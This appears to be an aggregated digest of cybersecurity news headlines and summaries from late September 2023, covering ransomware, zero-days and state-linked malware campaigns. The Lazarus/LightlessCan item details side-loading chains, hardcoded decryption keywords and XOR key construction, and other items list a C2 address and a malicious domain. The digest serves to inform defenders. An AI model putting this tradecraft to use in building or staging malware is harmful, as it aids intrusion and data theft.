            2023-09-29 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-29th-2023-dark-angels/
            This week has been a busy ransomware week, with ransomware attacks having a massive impact on organizations and the fallout of the MOVEit breaches to be disclosed. [...] "

            Autosummary: Cybersecurity firms, journalists, and law enforcement also released interesting reports this week. Contributors and those who provided new ransomware information and stories this week include @serghei, @Ionut_Ilascu, @BleepinComputer, @fwosar, @Seifreed, @demonslay335, @billtoulas, @LawrenceAbrams, @malwrhunterteam, @MalGamy12, @billseagull, @coveware, @GroupIB_TI, @briankrebs, @pcrisk, @FBI, @jgreigj, and @DrWeb_antivirus. During this time, the attackers claim to have stolen DWG files, engineering documents, databases, confidential documents, and client contracts. "


            Update Chrome now! Google patches another actively exploited vulnerability

            exploits
            2023-09-29 https://www.malwarebytes.com/blog/news/2023/09/update-chrome-now-google-patches-another-actively-exploited-vulnerability

            Categories: Exploits and vulnerabilities

            Categories: News

            Google has updated its Chrome Stable Channel to fix, among other things, an actively exploited vulnerability


            The post Update Chrome now! Google patches another actively exploited vulnerability appeared first on Malwarebytes Labs.

            "

            Autosummary: Posted: September 29, 2023. Google has updated the Stable Channel for Chrome to 117.0.5938.132 for Windows, Mac and Linux. The exploitation occurs when a program uses one method to allocate or initialize a resource, but an incompatible method then accesses that resource, potentially providing unsecured access to the browser’s memory. "


            A still unpatched zero-day RCE impacts more than 3.5M Exim servers

            exploits
            2023-09-29 https://securityaffairs.com/151693/hacking/cve-2023-42115-exim-mail-transfer.html

            Experts warn of a critical zero-day vulnerability, tracked as CVE-2023-42115, in all versions of Exim mail transfer agent (MTA) software. A critical zero-day vulnerability, tracked as CVE-2023-42115 (CVSS score 9.8), affects all versions of Exim mail transfer agent (MTA) software. A remote, unauthenticated attacker, can exploit the vulnerability to gain remote code execution (RCE) on Internet-exposed […]

            The post A still unpatched zero-day RCE impacts more than 3.5M Exim servers appeared first on Security Affairs.

            "

            Autosummary: A still unpatched zero-day RCE impacts more than 3.5M Exim servers. Pierluigi Paganini, September 29, 2023. Experts warn of a critical zero-day vulnerability, tracked as CVE-2023-42115, in all versions of Exim mail transfer agent (MTA) software. "


            Lazarus luring employees with trojanized coding challenges: The case of a Spanish aerospace company

            exploits
            2023-09-29 https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/
            While analyzing a Lazarus attack luring employees of an aerospace company, ESET researchers discovered a publicly undocumented backdoor "

            Autosummary: Execution chain 3: LightlessCan (complex version). The most complex chain we observed on the compromised system also delivers LightlessCan, with various components involved in the complete chain of installation stages: a legitimate application, an initial dropper, a complete dropper (which contains the configuration), an intermediate dropper, a configuration file, a file with system information (for the decryption of encrypted payloads on the file system), an intermediate loader and the final step, the LightlessCan RAT. As in the previous cases, three long keywords must be provided to decrypt the embedded payload: the name of the parent process (tabcal.exe), the internal parameter hardcoded in the binary (9zCnQP6o78753qg8), and the external parameter (LocalServiceNetworkRestricted) – this time not expressed as a command line parameter, but instead as the content of a file located at %WINDOWS%\system32\thumbs.db. Note that the lengths of the keywords are not all exactly 16 bytes, but the decryption process will still work if the oversized string is truncated to a 16-byte length (for instance, AudioEndpointBuilder to AudioEndpointBui), and the undersized string, fixmapi.exe, is treated as fixmapi.exe\x00\x00\x00\x00\x00, because the string was initialized as 260 instances of the NUL character.

            Summary of binaries involved in the attack:

            Location directory | Legitimate parent process | Malicious side-loaded DLL | Trojanized project (payload)
            C:\ProgramShared\ | PresentationHost.exe | mscoree.dll | NppyPluginDll (NickelLoader)
            C:\ProgramData\Adobe\ | colorcpl.exe | colorui.dll | LibreSSL 2.6.5 (miniBlindingCan)
            C:\ProgramData\Oracle\Java\ | fixmapi.exe | mapistub.dll | Lua plugin for Notepad++ 1.4.0.0 (LightlessCan)
            C:\ProgramData\Adobe\ARM\ | tabcal.exe | HID.dll | MZC8051 for Notepad++ 3.2 (LightlessCan)

            LightlessCan – new backdoor. The most interesting payload used in this campaign is LightlessCan, a successor of the group’s flagship HTTP(S) […]

            These keywords are as follows: the name of the parent process (PresentationHost), the internal parameter hardcoded in the binary (9zCnQP6o78753qg8), and the external parameter passed on the command line (‑embeddingObject), which is inherited from the parent process of PresentationHost.exe, being provided by Quiz1.exe or Quiz2.exe.

            To successfully decrypt the embedded data array, the dropper needs three keywords to be provided correctly: the name of the parent process (fixmapi.exe), the internal parameter hardcoded in the binary (IP7pdINfE9uMz63n), and the external parameter passed in the command line (AudioEndpointBuilder).

            As the core utilities of Windows are proprietary and not open-source, the developers of LightlessCan faced a choice: either to reverse engineer the closed-source system binaries or to get inspired by the code available via the Wine project, where many programs are rewritten in order to mimic their execution on other platforms like Linux, macOS, or ChromeOS.

            The group is responsible for high-profile incidents such as both the Sony Pictures Entertainment hack and tens-of-millions-of-dollar cyberheists in 2016, the WannaCryptor (aka WannaCry) outbreak in 2017, the 3CX and X_TRADER supply-chain attacks, and a long history of disruptive attacks against South Korean public and critical infrastructure since at least 2011. The most significant update is mimicked functionality of many native Windows commands like ping, ipconfig, systeminfo, sc, net, etc. The diversity, number, and eccentricity in implementation of Lazarus campaigns define this group, as well as the fact that it performs all three pillars of cybercriminal activities: cyberespionage, cybersabotage, and pursuit of financial gain.

            It uses the system information (same as the values stored in 4F59FB87DF2F) to decrypt the configuration file wlansvc.cpl and to locate, decrypt, and load the encrypted grpedit.dat, which is LightlessCan, the new full-featured RAT. As in the previous case, the lengths of the keywords are not all exactly 16 bytes, but the decryption will still work if the oversized string is truncated (for instance, to LocalServiceNetw) and the undersized string is extended with nulls (for instance, to tabcal.exe\x00\x00\x00\x00\x00\x00). The final payload is extracted and decrypted using XOR with a long key, which is a string built by concatenating the name of the parent process (colorcpl.exe), the filename of the dropper (colorui.dll), and the external command line parameter – in this case resulting in COLORCPL.EXECOLORUI.DLL669498484488D3F22712CC5BACA6B7A7.

            A complex chain of stages delivering the fourth payload. The initial dropper of the fourth chain is a malicious dynamically linked library HID.dll that is side-loaded by a legitimate executable, tabcal.exe, executed from C:\ProgramData\Adobe\ARM\. The DLL is a trojanized version of MZC8051.dll, a legitimate file from the 8051 C compiler plugin project for Notepad++.

            The most worrying aspect of the attack is the new type of payload, LightlessCan, a complex and possibly evolving tool that exhibits a high level of sophistication in its design and operation, representing a significant advancement in malicious capabilities compared to its predecessor, BlindingCan. Infrastructure: For the first-level C&C servers (listed in the Network section at the end of this blogpost), the attackers do not set up their own servers, but compromise existing ones, usually those having poor security and that host sites with neglected maintenance.

            There’s an encrypted data array in the DLL’s dumped body, together with multiple debug symbols revealing the root directory and the project from which it was built: W:\Develop\aTool\ShellCodeLoader\App\libressl-2.6.5\ As the name ShellCodeLoader suggests, the main purpose of this initial stage is to decrypt and load the data array from its body, which contains shellcode. LightlessCan is a new complex RAT that has support for up to 68 distinct commands, indexed in a custom function table, but in the current version, 1.0, only 43 of those commands are implemented with some functionality.

            [Figure: Hardcoded strings revealing the (partial) schtasks functionality] Furthermore, an examination of the RAT’s internal configuration suggests that, in comparison to BlindingCan, Lazarus increased the code sophistication in LightlessCan. "


            Ransomware groups are shifting their focus away from larger targets

            exploits
            2023-09-28 https://www.helpnetsecurity.com/2023/09/28/ransomware-victims-number/

            One in every six ransomware attacks targeting US government offices was traced back to the LockBit ransomware group, according to Trend Micro. Overall ransomware attack victim numbers increased by 47% from H2 2022. “We’ve observed a significant increase in the number of ransomware victims since the second half of 2022. Threat actors continue to innovate, target more victims, and cause significant financial and reputational damage. Organizations of all sizes must prioritize and enhance their cybersecurity … More

            The post Ransomware groups are shifting their focus away from larger targets appeared first on Help Net Security.

            "

            Autosummary: LockBit, the top ransomware family since 2022, accounted for 26.09% of total victim organizations, with BlackCat and Clop responsible for 10.59% and 10.09% of attacks, respectively. "


            Update Chrome Now: Google Releases Patch for Actively Exploited Zero-Day Vulnerability

            exploits
            2023-09-28 https://thehackernews.com/2023/09/update-chrome-now-google-releases-patch.html
            Google on Wednesday rolled out fixes to address a new actively exploited zero-day in the Chrome browser. Tracked as CVE-2023-5217, the high-severity vulnerability has been described as a heap-based buffer overflow in the VP8 compression format in libvpx, a free software video codec library from Google and the Alliance for Open Media (AOMedia). Exploitation of such buffer overflow flaws can "

            Autosummary: "


            The hidden costs of neglecting cybersecurity for small businesses

            ciber
            2023-09-28 https://www.helpnetsecurity.com/2023/09/28/raffaele-mautone-judy-security-small-businesses-cybersecurity-solutions/

            In this Help Net Security interview, Raffaele Mautone, CEO of Judy Security, talks about the cybersecurity problems that small businesses face and the need for prioritization to save businesses from potential fines and damage to their brand reputation. He also discusses trends and steps small businesses can take to protect themselves, even with an insufficient cybersecurity budget. One of the primary reasons small business owners cite for not investing in cybersecurity is the expense involved. … More

            The post The hidden costs of neglecting cybersecurity for small businesses appeared first on Help Net Security.

            "

            Autosummary: Additionally, employees should be well-versed in proper data handling, including encryption and secure file sharing practices, and should be educated on device security, including keeping devices updated with security patches and using secure networks. In this Help Net Security interview, Raffaele Mautone, CEO of Judy Security, talks about the cybersecurity problems that small businesses face and the need for prioritization to save businesses from potential fines and damage to their brand reputation. "


            Yet another Chrome zero-day exploited in the wild! (CVE-2023-5217)

            exploits
            2023-09-28 https://www.helpnetsecurity.com/2023/09/28/cve-2023-5217/

            Google has fixed another critical zero-day vulnerability (CVE-2023-5217) in Chrome that is being exploited in the wild. About CVE-2023-5217 The vulnerability is caused by a heap buffer overflow in vp8 encoding in libvpx – a video codec library from Google and the Alliance for Open Media (AOMedia). Heap buffer overflows can cause program crashes or arbitrary code execution. CVE-2023-5217 has been fixed in Google Chrome 117.0.5938.132 for Windows, Mac and Linux users. Google noted that … More

            The post Yet another Chrome zero-day exploited in the wild! (CVE-2023-5217) appeared first on Help Net Security.

            "

            Autosummary: "


            China-Linked Budworm Targeting Middle Eastern Telco and Asian Government Agencies

            government Telcos
            2023-09-28 https://thehackernews.com/2023/09/china-linked-budworm-targeting-middle.html
            Government and telecom entities have been subjected to a new wave of attacks by a China-linked threat actor tracked as Budworm using an updated malware toolset. The intrusions, targeting a Middle Eastern telecommunications organization and an Asian government, took place in August 2023, with the adversary deploying an improved version of its SysUpdate toolkit, the Symantec Threat Hunter Team, "

            Autosummary: Budworm, also referred to by the names APT27, Bronze Union, Emissary Panda, Iron Tiger, Lucky Mouse, and Red Phoenix, is known to be active since at least 2013, targeting a wide range of industry verticals in pursuit of its intelligence gathering goals. "


            GOOGLE FIXED THE FIFTH CHROME ZERO-DAY OF 2023

            exploits
            2023-09-28 https://securityaffairs.com/151625/hacking/google-fifth-chrome-zero-day-2023.html

            Google released security updates to address a new actively exploited zero-day vulnerability, tracked as CVE-2023-5217, in the Chrome browser. Google on Wednesday released security updates to address a new actively exploited zero-day flaw in the Chrome browser which is tracked as CVE-2023-5217. The CVE-2023-5217 is a high-severity heap buffer overflow that affects vp8 encoding in […]

            The post GOOGLE FIXED THE FIFTH CHROME ZERO-DAY OF 2023 appeared first on Security Affairs.

            "

            Autosummary: This is the fifth actively exploited zero-day vulnerability in Chrome addressed by Google this year; the other ones are: CVE-2023-2033 (CVSS score: 8.8) – Type Confusion in V8; CVE-2023-2136 (CVSS score: 9.6) – Integer overflow in the Skia graphics library; CVE-2023-3079 (CVSS score: 8.8) – Type Confusion in V8; CVE-2023-4863 (CVSS score: 8.8) – "


            Cisco urges admins to fix IOS software zero-day exploited in attacks

            exploits
            2023-09-28 https://www.bleepingcomputer.com/news/security/cisco-urges-admins-to-fix-ios-software-zero-day-exploited-in-attacks/
            Cisco warned customers on Wednesday to patch a zero-day IOS and IOS XE software vulnerability targeted by attackers in the wild. [...] "

            Autosummary: "


            Security researcher stopped at US border for investigating crypto scam

            financial
            2023-09-28 https://www.bleepingcomputer.com/news/security/security-researcher-stopped-at-us-border-for-investigating-crypto-scam/
            Security researcher Sam Curry describes a stressful situation he encountered upon his return to the U.S. when border officials and federal agents seized and searched his electronic devices. Curry was further served with a "Grand Jury" subpoena that demanded him to appear in court for testimony. [...] "

            Autosummary: He was, however, served a subpoena issued by the Southern District of New York demanding his appearance at the court for testimony. [Image: Subpoena issued by SDNY to Sam Curry] "After they’d questioned me, I was asked to leave the room while they sat and searched through my unlocked device for another hour," the researcher shared on X (Twitter) in a thread that has now been deleted. "At this point I’d been given almost no information on whether or not I was a subject, witness, or anything related to the case at all." "Once they were finished, I was told that I could leave and immediately contacted a lawyer. "


            Budworm hackers target telcos and govt orgs with custom malware

            exploits
            2023-09-28 https://www.bleepingcomputer.com/news/security/budworm-hackers-target-telcos-and-govt-orgs-with-custom-malware/
            A Chinese cyber-espionage hacking group tracked as Budworm has been observed targeting a telecommunication firm in the Middle East and a government entity in Asia using a new variant of its custom "SysUpdate" backdoor. [...] "

            Autosummary: The SysUpdate malware is a remote access trojan (RAT) associated with Budworm (aka APT27 or Emissary Panda) since 2020, supporting Windows service, process, and file management, command execution, data retrieval, and screenshot capturing. "


            Ransomware group demands $51 million from Johnson Controls after cyber attack

            exploits
            2023-09-28 https://www.bitdefender.com/blog/hotforsecurity/ransomware-group-demands-51-million-from-johnson-controls-after-cyber-attack/
            Johnson Controls, a multinational conglomerate that secures industrial control systems, security equipment, fire safety and air conditioning systems, has been hit by a massive cyber attack. Read more in my article on the Hot for Security blog. "

            Autosummary: My hunch is that the Dark Angels group were being rather optimistic when in their extortion message to Johnson Controls they insisted that "co-operating with the FBI, CISA, and so on and involving their officers in negotiations" was "strictly forbidden" and would result in them ending negotiations and result in all of the leaked data being published for free. "


            Norton Small Business offers protection against scams and phishing threats

            financial
            2023-09-28 https://www.helpnetsecurity.com/2023/09/28/norton-small-business/

            Norton announced Norton Small Business, the all-in-one cybersecurity solution to help entrepreneurs and small business owners protect their financial futures. While nearly 90% of businesses globally are small businesses – 99.9% in the US – many lack the means to protect their digital environments. Norton Small Business makes triple-lock protection accessible for small businesses to safeguard their team’s online activities, devices and customer data in an easy, all-in-one cybersecurity solution. “Owning a very small business … More

            The post Norton Small Business offers protection against scams and phishing threats appeared first on Help Net Security.

            "

            Autosummary: Setting up your one-person IT department. Norton is your go-to partner to make small business cybersecurity simple with an all-in-one solution that provides 24/7 cybersecurity protection and a variety of features, including: Secure Browser, Password Manager and VPN (virtual private network) to help secure day-to-day online activities; automated PC cleaning and optimization to keep healthier PCs for longer; Secure Cloud Backup for PCs to help reduce the risk of loss of business data; software and driver updaters to help keep software up to date, so there are fewer vulnerabilities for cybercriminals to exploit; IT coverage and maintenance for up to 20 devices; and a 100% Virus Protection Promise. “We’ve built our small business products and services with the same approach in mind as we do with our consumer portfolio, so entrepreneurs don’t need to worry about becoming cybersecurity experts,” said Rapparini. "


China’s BlackTech Hacking Group Exploited Routers to Target U.S. and Japanese Companies

            exploits
            2023-09-28 https://thehackernews.com/2023/09/chinas-blacktech-hacking-group.html
Cybersecurity agencies from Japan and the U.S. have warned of attacks mounted by a state-backed hacking group from China to stealthily tamper with branch routers and use them as jumping-off points to access the networks of various companies in the two countries. The attacks have been tied to a malicious cyber actor dubbed BlackTech by the U.S. National Security Agency (NSA), Federal Bureau of

Autosummary: It has since been attributed to a wide range of backdoors such as BendyBear, BIFROSE (aka Bifrost), Consock, KIVARS, PLEAD, TSCookie (aka FakeDead), XBOW, and Waterbear (aka DBGPRINT).


            Dark Angels Team ransomware group hit Johnson Controls

            exploits ransomware
            2023-09-28 https://securityaffairs.com/151636/cyber-crime/dark-angels-team-ransomware-group-hit-johnson-controls.html

            Johnson Controls International suffered a ransomware attack that impacted the operations of the company and its subsidiaries. Johnson Controls International plc is a multinational conglomerate with a diversified portfolio of products and services primarily focused on building technologies and solutions. The company provides HVAC (heating, ventilation, and air conditioning), solutions for building automation, fire and […]

            The post Dark Angels Team ransomware group hit Johnson Controls appeared first on Security Affairs.


Autosummary: Dark Angels Team created a new variant of their Linux ransomware to target @johnsoncontrols. New sample: fe8b6b7c3c86df0ee47a3cb04a68891fd5e91f3bfb13482112dd9042e8baebdf; old sample: 3b56cea72e8140a7044336933cf382d98dd95c732e5937a0a61e0e7296762c7b — Gameel Ali (@MalGamy12), September 27, 2023. According to BleepingComputer, the ransomware group is demanding $51 million to provide a decryptor; the amount of the ransom was confirmed by Malware Hunter Team researchers: Dark Angels’ base ransom amount for Johnson Controls is $51 million.


            Bing Chat responses infiltrated by ads pushing malware

            exploits
            2023-09-28 https://www.bleepingcomputer.com/news/security/bing-chat-responses-infiltrated-by-ads-pushing-malware/
Malicious advertisements are now being injected into Microsoft’s AI-powered Bing Chat responses, promoting fake download sites that distribute malware. [...]

Autosummary: Malicious ads created by the threat actor (Source: Malwarebytes). Clicking on the malicious ad for the IP scanner takes users to a website ("mynetfoldersip[.]cfd") that separates bots and crawlers from human victims by checking IP address, timezone, and various system indicators for sandbox/virtual machines.


            FBI: Dual ransomware attack victims now get hit within 48 hours

            exploits ransomware
            2023-09-28 https://www.bleepingcomputer.com/news/security/fbi-dual-ransomware-attack-victims-now-get-hit-within-48-hours/
The FBI has warned about a new trend in ransomware attacks where multiple strains are deployed on victims’ networks to encrypt systems in under two days. [...]

Autosummary: 48 hours between ransomware attacks. In contrast to the past, when ransomware groups typically required a minimum of 10 days to execute such attacks, now the vast majority of ransomware incidents targeting the same victim take place within a mere 48 hours of each other, according to the FBI’s data.


            Cisco urges to patch actively exploited IOS zero-day CVE-2023-20109

            exploits
            2023-09-28 https://securityaffairs.com/151647/hacking/cisco-cve-2023-20109-actively-exploited.html

Cisco released security updates for an actively exploited zero-day flaw (CVE-2023-20109) that resides in the GET VPN feature of IOS and IOS XE software. Cisco warned customers to install security updates to address an actively exploited zero-day vulnerability, tracked as CVE-2023-20109 (CVSS 6.6), that resides in IOS and IOS XE software. The vulnerability resides in […]

            The post Cisco urges to patch actively exploited IOS zero-day CVE-2023-20109 appeared first on Security Affairs.


Autosummary: Cisco confirmed that this vulnerability does not affect the following products: IOS XR Software, Meraki products, and NX-OS Software.


            Progress warns of maximum severity WS_FTP Server vulnerability

            exploits
            2023-09-28 https://www.bleepingcomputer.com/news/security/progress-warns-of-maximum-severity-ws-ftp-server-vulnerability/
Progress, the maker of the MOVEit Transfer file-sharing platform recently exploited in widespread data theft attacks, warned customers to patch a maximum severity vulnerability in its WS_FTP Server software. [...]

Autosummary: Clop has been linked to multiple high-impact data theft and extortion campaigns targeting other managed file transfer platforms, including Accellion FTA servers in December 2020, the 2021 SolarWinds Serv-U Managed File Transfer attacks, and the mass exploitation of a GoAnywhere MFT zero-day in January 2023.


            Microsoft breach led to theft of 60,000 US State Dept emails

            government
            2023-09-28 https://www.bleepingcomputer.com/news/security/microsoft-breach-led-to-theft-of-60-000-us-state-dept-emails/
Chinese hackers stole tens of thousands of emails from U.S. State Department accounts after breaching Microsoft’s cloud-based Exchange email platform in May. [...]

Autosummary: During a recent Senate staff briefing, U.S. State Department officials disclosed that the attackers stole at least 60,000 emails from Outlook accounts belonging to State Department officials stationed in East Asia, the Pacific, and Europe, as Reuters first reported.


            Peruvian man charged with sending 150 hoax bomb threats in the US

            latam
            2023-09-28 https://www.bbc.co.uk/news/world-us-canada-66955698?at_medium=RSS&at_campaign=KARANGA
Prosecutors say the Peruvian man was retaliating against minors who refused to send explicit pictures.



            Critical libwebp Vulnerability Under Active Exploitation - Gets Maximum CVSS Score

            exploits
            2023-09-27 https://thehackernews.com/2023/09/new-libwebp-vulnerability-under-active.html
Google has assigned a new CVE identifier for a critical security flaw in the libwebp image library for rendering images in the WebP format that has come under active exploitation in the wild. Tracked as CVE-2023-5129, the issue has been given the maximum severity score of 10.0 on the CVSS rating system. It has been described as an issue rooted in the Huffman coding algorithm - With a specially

Autosummary: The flaws are believed to have been put to use alongside three other flaws – CVE-2022-4262, CVE-2022-3038, CVE-2022-22706 – by a customer or partner of a Spanish spyware company known as Variston IT.


            Appdome unveils mobile anti-malware protections

            exploits
            2023-09-27 https://www.helpnetsecurity.com/2023/09/27/appdome-mobile-anti-malware-protections/

Appdome announced new mobile anti-malware protections that detect Android Accessibility Service malware such as Xenomorph, Brasdex, Octo, Sharkbot, Flubot, TeaBot, PixPirate, Sova, Spynote, Joker and more. These malware families are used to carry out large-scale, distributed attacks on mobile banking apps, crypto wallets, and other financial services apps. Accessibility Service is the Android framework designed to allow mobile applications built for individuals with disabilities to interact with all applications on an Android device. Unfortunately, Accessibility … More

            The post Appdome unveils mobile anti-malware protections appeared first on Help Net Security.




            Google “confirms” that exploited Chrome zero-day is actually in libwebp (CVE-2023-5129)

            exploits
            2023-09-27 https://www.helpnetsecurity.com/2023/09/27/cve-2023-5129/

The Chrome zero-day exploited in the wild and patched by Google a few weeks ago has a new ID (CVE-2023-5129) and a description that tells the whole story: the vulnerability is not in Chrome but in the libwebp library, which is used by many popular applications for encoding/decoding the WebP image format. About CVE-2023-5129: The source of the vulnerability is a flawed implementation of the Huffman coding algorithm, which may allow attackers to trigger a heap … More

            The post Google “confirms” that exploited Chrome zero-day is actually in libwebp (CVE-2023-5129) appeared first on Help Net Security.


Autosummary: Rezilion’s Ofri Ouzan and Yotam Perkal pointed out that the libwebp library can be found in: popular container images, “collectively downloaded and deployed billions of times” (e.g., drupal, nginx, perl, python, ruby, rust, wordpress); a variety of utilities that depend on libwebp; and the most popular web browsers (Chrome, Firefox, Microsoft Edge, Opera, etc.).


            New ZenRAT Malware Targeting Windows Users via Fake Password Manager Software

            exploits
            2023-09-27 https://thehackernews.com/2023/09/new-zenrat-malware-targeting-windows.html
A new malware strain called ZenRAT has emerged in the wild that’s distributed via bogus installation packages of the Bitwarden password manager. "The malware is specifically targeting Windows users and will redirect people using other hosts to a benign web page," enterprise security firm Proofpoint said in a technical report. "The malware is a modular remote access trojan (RAT) with information

Autosummary: ZenRAT, once launched, gathers details about the host, including CPU name, GPU name, operating system version, browser credentials, and installed applications and security software, and sends them to a command-and-control (C2) server (185.186.72[.]14) operated by the threat actors.


            ‘Ransomed.vc’ in the Spotlight – What is Known About the Ransomware Group Targeting Sony and NTT Docomo

            exploits ransomware
            2023-09-27 https://securityaffairs.com/151550/data-breach/ransomed-vc-sony-ntt-alleged-attacks.html

Following the recently announced data leak from Sony, the Ransomed.vc group claimed the hack of the Japanese giant NTT Docomo. Following the recently announced data leak from Sony, the notorious ransomware syndicate Ransomed.vc announced a new victim today in the form of the largest Japanese telecommunications giant, NTT Docomo. Notably, the announcement came almost synchronously with the […]

            The post ‘Ransomed.vc’ in the Spotlight – What is Known About the Ransomware Group Targeting Sony and NTT Docomo appeared first on Security Affairs.


Autosummary: Resecurity uncovered interesting connections to independent hacktivist groups which later united in alliances like “Five Families”, a coalition of several groups (STORMOUS, GhostSec, SigedSec, ThreatSec) previously responsible for large-scale cybersecurity incidents.


Monterrey gangs: Bodies dumped in Mexico’s business capital

            latam
            2023-09-27 https://www.bbc.co.uk/news/world-latin-america-66911902?at_medium=RSS&at_campaign=KARANGA
The remains of a dozen people are found strewn across the northern Mexican city of Monterrey.



            SeeMetrics releases customizable Cybersecurity Performance Boards

            industry ciber
            2023-09-27 https://www.helpnetsecurity.com/2023/09/27/seemetrics-cybersecurity-performance-boards/

            SeeMetrics launched its latest innovation: Customizable Cybersecurity Performance Boards. This product launch marks a significant milestone as it allows security leaders to communicate their desired narrative to different stakeholders and in the context that matters most to them. This customization comes in two essential dimensions: Security leaders can now instantaneously create their own Cybersecurity Performance Boards, selecting from a library of ready-to-use metrics that align with their specific needs and goals. Secondly, the customization extends … More

            The post SeeMetrics releases customizable Cybersecurity Performance Boards appeared first on Help Net Security.


Autosummary: Secondly, the customization extends to the metrics level as well, allowing leaders to set thresholds, filter business units, timeframes, asset types, geographic considerations and more in a dynamic way.


            New twist on ZeroFont phishing technique spotted in the wild

            financial
            2023-09-27 https://www.helpnetsecurity.com/2023/09/27/zerofont-phishing/

Cybercriminals are leveraging the ZeroFont technique to trick users into trusting phishing emails, SANS ISC handler Jan Kopriva has warned. The ZeroFont phishing attack: Documented and named by Avanan in 2018, the ZeroFont technique involves using text written in font size “0” throughout the email body. In that campaign, it was used to bypass Microsoft’s NLP-based anti-phishing protections by breaking up the text strings that would otherwise trigger them. A new purpose: Email clients generally … More

            The post New twist on ZeroFont phishing technique spotted in the wild appeared first on Help Net Security.




            Red Cross-Themed Phishing Attacks Distributing DangerAds and AtlasAgent Backdoors

            financial
            2023-09-27 https://thehackernews.com/2023/09/red-cross-themed-phishing-attacks.html
A new threat actor known as AtlasCross has been observed leveraging Red Cross-themed phishing lures to deliver two previously undocumented backdoors named DangerAds and AtlasAgent. NSFOCUS Security Labs described the adversary as having a "high technical level and cautious attack attitude," adding that "the phishing attack activity captured this time is part of the attacker’s targeted strike on



            Researchers Uncover New GPU Side-Channel Vulnerability Leaking Sensitive Data

            exploits
            2023-09-27 https://thehackernews.com/2023/09/researchers-uncover-new-gpu-side.html
A novel side-channel attack called GPU.zip renders virtually all modern graphics processing units (GPU) vulnerable to information leakage. "This channel exploits an optimization that is data dependent, software transparent, and present in nearly all modern GPUs: graphical data compression," a group of academics from the University of Texas at Austin, Carnegie Mellon University, University of

Autosummary: This, in turn, is rooted in the fact that some web standards allow the framing page to apply visual effects (i.e., SVG filters) to the iframed page, thereby exposing the mechanism to side-channel attacks by, say, computing the time differences between rendering black and white pixels and then distinguishing between them using the timing information.


            Building automation giant Johnson Controls hit by ransomware attack

            exploits ransomware
            2023-09-27 https://www.bleepingcomputer.com/news/security/building-automation-giant-johnson-controls-hit-by-ransomware-attack/
Johnson Controls International has suffered what is described as a massive ransomware attack that encrypted many of the company’s devices, including VMware ESXi servers, impacting the company’s and its subsidiaries’ operations. [...]

Autosummary: The company employs 100,000 people through its corporate operations and subsidiaries, including York, Tyco, Luxaire, Coleman, Ruskin, Grinnel, and Simplex.


            Google fixes fifth actively exploited Chrome zero-day of 2023

            exploits
            2023-09-27 https://www.bleepingcomputer.com/news/security/google-fixes-fifth-actively-exploited-chrome-zero-day-of-2023/
Google has patched the fifth Chrome zero-day vulnerability exploited in attacks since the start of the year in emergency security updates released today. [...]

Autosummary: While first marking it as a Chrome flaw, the company later assigned another CVE (CVE-2023-5129) and a maximum 10/10 severity rating, tagging it as a critical security vulnerability in libwebp (a library used by a large number of projects, including Signal, 1Password, Mozilla Firefox, Microsoft Edge, Apple’s Safari, and the native Android web browser).


            Fake Bitwarden sites push new ZenRAT password-stealing malware

            exploits
            2023-09-27 https://www.bleepingcomputer.com/news/security/fake-bitwarden-sites-push-new-zenrat-password-stealing-malware/
Fake Bitwarden sites are pushing installers purportedly for the open-source password manager that carry a new password-stealing malware that security researchers call ZenRAT. [...]

Autosummary: Stealing data, evading analysis: once running, ZenRAT uses WMI queries and other system tools to collect data about the host, which includes CPU name, GPU name, OS version, installed RAM, IP address and gateway, installed antivirus, and installed applications. The details above are delivered to the command and control (C2) server in a ZIP archive that also includes data and credentials collected from the web browser.


            Pegasus spyware and how it exploited a WebP vulnerability

            exploits
            2023-09-27 https://www.malwarebytes.com/blog/news/2023/09/pegasus-spyware-and-how-it-exploited-a-webp-vulnerability

Categories: Android, Apple, Exploits and vulnerabilities

Tags: Pegasus, spyware, nso, webp, libwebp, buffer overflow

The company behind the infamous Pegasus spyware used a vulnerability in almost every browser to plant their malware on victims’ devices.


            The post Pegasus spyware and how it exploited a WebP vulnerability appeared first on Malwarebytes Labs.


Autosummary: Our own David Ruiz wrote: “Pegasus is reportedly instrumental to several governments’ oppressive surveillance campaigns against their own citizens and residents, and, while NSO Group has repeatedly denied allegations that it complicitly sells Pegasus to human right abusers, it is difficult to reconcile exactly how the zero-click spyware program—which non-consensually and invisibly steals emails, text messages, photos, videos, locations, passwords, and social media activity—is at the same time a tool that can, in its very use, respect the rights of those around the world to speak freely, associate safely, and live privately.” Both of the vulnerabilities, CVE-2023-41064 and CVE-2023-4863, were based on a heap buffer overflow in libwebp, the code library used to encode and decode images in the WebP format. On September 12, 2023 we published two blogs urging our readers to urgently patch two Apple issues which were added to the catalog of known exploited vulnerabilities by the Cybersecurity & Infrastructure Security Agency (CISA), and to apply an update for Chrome that included one critical security fix for an actively exploited vulnerability.


            Malwarebytes MDR wins G2 awards for "Best ROI," "Easiest to Use," and more

            exploits
            2023-09-27 https://www.malwarebytes.com/blog/business/2023/09/malwarebytes-mdr-wins-g2-awards-for-best-roi-easiest-to-use-and-more

            Categories: Business

Customers rated Malwarebytes MDR as “Easiest to do Business With,” “Best Est. ROI,” “Easiest to Use,” “Easiest Admin,” and more.


            The post Malwarebytes MDR wins G2 awards for "Best ROI," "Easiest to Use," and more appeared first on Malwarebytes Labs.


Autosummary: Dennis Davis, IT Systems Manager. Experience Malwarebytes MDR: award-winning ROI, user-friendly, and effective threat defense. Malwarebytes MDR provides IT staff with award-winning business protection, offering 24x7 alert monitoring and guidance, active remediation, and threat hunting across endpoints.


            Malwarebytes Admin update: New Detection screens to manage threats!

            exploits
            2023-09-27 https://www.malwarebytes.com/blog/business/2023/09/malwarebytes-admin-1.2-update-new-detection-screens-to-manage-threats

            Categories: Business

We released version 1.2 of the Malwarebytes Admin app for iOS and Android last week, featuring new Detections features that add visibility into threats.


            The post Malwarebytes Admin update: New Detection screens to manage threats! appeared first on Malwarebytes Labs.


Autosummary: For each item in the detections list, admins can see: Threat Name, Action Taken, Category (Malware, PUP, etc.) and Endpoint Name. Administrators are also able to filter detections by Endpoint Name, Threat Name, Action Taken, Category, and more.


            Russian zero-day broker is willing to pay $20M for zero-day exploits for iPhones and Android devices

            exploits rusia-ucrania
            2023-09-27 https://securityaffairs.com/151607/hacking/russian-zero-day-broker-offering.html

            A Russian zero-day broker is willing to pay $20 million for zero-day exploits for iPhones and Android mobile devices. The Russian zero-day broker firm Operation Zero is increasing payouts for top-tier mobile exploits. The company is willing to pay up to $20,000,000 for zero-day exploits for iPhone and Android devices. The Russian company pointed out […]

